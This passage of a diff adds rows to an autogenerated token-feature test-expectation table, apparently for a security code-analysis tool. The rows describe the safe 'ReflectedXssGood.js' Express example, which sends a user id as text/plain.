autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | exceptional return of function textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | exceptional return of function textContentType | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | exceptional return of function textContentType | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | exceptional return of function textContentType | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | functio ... ain";\\n} | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | functio ... ain";\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | functio ... ain";\\n} | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | return of function textContentType | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | return of function textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | return of function textContentType | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | return of function textContentType | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | return of function textContentType | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:10:32:24 | textContentType | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:10:32:24 | textContentType | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:10:32:24 | textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:10:32:24 | textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:10:32:24 | textContentType | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:10:32:24 | textContentType | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:10:32:24 | textContentType | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:3:33:8 | result | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:3:33:8 | result | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:3:33:8 | result | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:3:33:8 | result | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:3:33:8 | result | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:3:33:23 | result ... /plain" | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:3:33:23 | result ... /plain" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:3:33:23 | result ... /plain" | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:3:33:23 | result ... /plain" | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:3:33:23 | result ... /plain" | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:12:33:23 | "text/plain" | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:12:33:23 | "text/plain" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:12:33:23 | "text/plain" | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:12:33:23 | "text/plain" | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:33:12:33:23 | "text/plain" | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:36:3 | app | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:36:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:36:3 | app | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:36:7 | app.get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:36:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:36:7 | app.get | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:44:2 | app.get ... ;\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:44:2 | app.get ... ;\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:44:2 | app.get ... ;\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:44:2 | exceptional return of app.get ... ;\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:44:2 | exceptional return of app.get ... ;\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:1:44:2 | exceptional return of app.get ... ;\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:5:36:7 | get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:5:36:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:5:36:7 | get | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:9:36:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:9:36:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:9:36:19 | '/user/:id' | calleeImports | express | @@ -21117,6 +140893,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:9:36:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:9:36:19 | '/user/:id' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:9:36:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:36:21 | textContentType | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:36:21 | textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:36:21 | textContentType | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:36:21 | textContentType | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:36:21 | textContentType | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:36:21 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:36:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:36:21 | this | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:36:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:36:21 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | 'arguments' object of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | exceptional return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | exceptional return of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | exceptional return of anonymous function | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | functio ... ;\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | functio ... ;\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | functio ... ;\\n} | calleeImports | express | @@ -21124,6 +140920,96 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | functio ... ;\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | functio ... ;\\n} | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | functio ... ;\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | return of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:22:44:1 | return of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:31:36:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:31:36:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:31:36:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:31:36:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:31:36:33 | req | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:31:36:33 | req | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:31:36:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:31:36:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:31:36:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:31:36:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:36:36:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:36:36:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:36:36:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:36:36:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:36:36:38 | res | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:36:36:38 | res | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:36:36:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:36:36:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:36:36:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:36:36:36:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:7:37:35 | !isVali ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:7:37:35 | !isVali ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:7:37:35 | !isVali ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:7:37:35 | !isVali ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:7:37:35 | !isVali ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:20 | isValidUserId | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:20 | isValidUserId | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:20 | isValidUserId | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:20 | isValidUserId | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:20 | isValidUserId | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:35 | exceptional return of isValid ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:35 | exceptional return of isValid ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:35 | exceptional return of isValid ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:35 | exceptional return of isValid ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:35 | exceptional return of isValid ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:35 | isValid ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:35 | isValid ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:35 | isValid ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:35 | isValid ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:8:37:35 | isValid ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:22:37:24 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:22:37:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:22:37:24 | req | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:22:37:24 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:22:37:24 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:22:37:31 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:22:37:31 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:22:37:31 | req.params | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:22:37:31 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:22:37:31 | req.params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:26:37:31 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:26:37:31 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:26:37:31 | params | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:26:37:31 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:26:37:31 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:33:37:34 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:33:37:34 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:33:37:34 | id | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:33:37:34 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:37:33:37:34 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:7 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:7 | res | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:7 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:11 | res.set | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:11 | res.set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:11 | res.set | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:11 | res.set | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:11 | res.set | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:46 | exceptional return of res.set ... Type()) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:46 | exceptional return of res.set ... Type()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:46 | exceptional return of res.set ... Type()) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:46 | exceptional return of res.set ... Type()) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:46 | exceptional return of res.set ... Type()) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:46 | res.set ... Type()) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:46 | res.set ... Type()) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:46 | res.set ... Type()) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:46 | res.set ... Type()) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:5:39:46 | res.set ... Type()) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:9:39:11 | set | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:9:39:11 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:9:39:11 | set | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:9:39:11 | set | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:9:39:11 | set | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:13:39:26 | 'Content-Type' | CalleeFlexibleAccessPath | res.set | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:13:39:26 | 'Content-Type' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:13:39:26 | 'Content-Type' | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21132,6 +141018,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:13:39:26 | 'Content-Type' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:13:39:26 | 'Content-Type' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:13:39:26 | 'Content-Type' | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:43 | textContentType | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:43 | textContentType | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:43 | textContentType | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:43 | textContentType | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:43 | textContentType | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:45 | exceptional return of textContentType() | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:45 | exceptional return of textContentType() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:45 | exceptional return of textContentType() | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:45 | exceptional return of textContentType() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:45 | exceptional return of textContentType() | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:45 | textContentType() | CalleeFlexibleAccessPath | res.set | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:45 | textContentType() | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:45 | textContentType() | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21140,6 +141036,37 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:45 | textContentType() | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:45 | textContentType() | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:39:29:39:45 | textContentType() | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:7 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:7 | res | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:7 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:12 | res.send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:12 | res.send | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type textContentType res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:12 | res.send | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:46 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:40:5:40:46 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| 